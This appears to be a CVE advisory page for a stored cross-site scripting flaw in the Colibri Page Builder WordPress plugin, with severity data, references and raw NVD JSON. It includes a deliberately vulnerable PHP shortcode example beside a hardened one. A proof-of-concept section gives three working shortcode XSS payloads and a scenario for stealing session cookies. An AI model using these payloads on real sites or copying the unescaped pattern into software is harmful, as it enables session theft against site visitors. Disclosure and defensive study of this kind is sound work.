Security Vulnerability Report
CVE-2025-11747 CVSS 6.4 MEDIUM

CVE-2025-11747

Published: 2025-12-19 09:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the colibri_blog_posts shortcode in all versions up to, and including, 1.0.345 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
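As an added illustration of the defect class the description names, and not the plugin's own code, the following hypothetical WordPress shortcode handler reflects user-supplied attributes into markup and is shown next to a hardened version; the shortcode and function names are assumptions, while shortcode_atts(), sanitize_title(), absint(), esc_attr() and esc_html() are WordPress core functions.

```php
<?php
// Constructed illustration (not Colibri's code): a shortcode handler that
// renders user-supplied attributes into HTML, before and after hardening.
// Shortcode attributes are controlled by anyone who can save post content
// (contributors included), and WordPress core does not sanitize them.

// BEFORE (the CWE-79 pattern): attributes land in markup unescaped.
function vulnerable_blog_posts_shortcode( $atts ) {
    $category = isset( $atts['category'] ) ? $atts['category'] : '';
    $posts    = isset( $atts['posts'] ) ? $atts['posts'] : '5';
    // Both values are interpolated verbatim into an attribute and a text node,
    // so a quote or a tag inside them changes the page's markup.
    return '<div class="blog-posts" data-category="' . $category . '">'
         . 'Showing ' . $posts . ' posts</div>';
}

// AFTER: validate each attribute to the type the feature actually needs,
// then escape for the exact output context at the point of output.
function hardened_blog_posts_shortcode( $atts ) {
    $atts = shortcode_atts(
        array( 'category' => '', 'posts' => 5 ),
        $atts,
        'hypothetical_blog_posts' // assumed shortcode tag
    );
    // A category is a slug: keep only slug-safe characters.
    $category = sanitize_title( $atts['category'] );
    // A post count is an integer: coerce it and cap it.
    $posts = min( absint( $atts['posts'] ), 50 );

    // esc_attr() for attribute context, esc_html() for text context.
    return '<div class="blog-posts" data-category="' . esc_attr( $category ) . '">'
         . 'Showing ' . esc_html( (string) $posts ) . ' posts</div>';
}

add_shortcode( 'hypothetical_blog_posts', 'hardened_blog_posts_shortcode' );
```

When reviewing a shortcode fix, check that every attribute is both validated to its expected type and escaped where it is written out; the changeset linked under References is the place to confirm that for this plugin.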

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Colibri Page Builder WordPress plugin <= 1.0.345

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```text
// CVE-2025-11747 PoC - Stored XSS in Colibri Page Builder
// Author: [email protected]
// Affected: Colibri Page Builder <= 1.0.345

// Method 1: Via WordPress Shortcode (requires Contributor+ access)
// Add this shortcode to any WordPress page/post:
[colibri_blog_posts category='"><script>alert(document.cookie)</script>']

// Method 2: Via category attribute injection
[colibri_blog_posts category='test" onmouseover="alert(1)" x=']

// Method 3: Via posts parameter
[colibri_blog_posts posts='<img src=x onerror=alert(document.domain)>']

// Exploitation scenario:
// 1. Attacker with Contributor role creates/edits a post
// 2. Inserts malicious shortcode with XSS payload
// 3. Saves/publishes the post
// 4. Any user viewing the post will execute the injected JS
// 5. Attacker can steal session cookies, perform actions as victim

// Reference: https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php#L251
```

References

- https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php#L251
- https://plugins.trac.wordpress.org/changeset/3421590/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e3305b39-5f7b-493b-80b5-cb925c2710c1?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11747",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-19T09:15:45.963",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the colibri_blog_posts shortcode in all versions up to, and including, 1.0.345 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php#L251",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3421590/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3305b39-5f7b-493b-80b5-cb925c2710c1?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```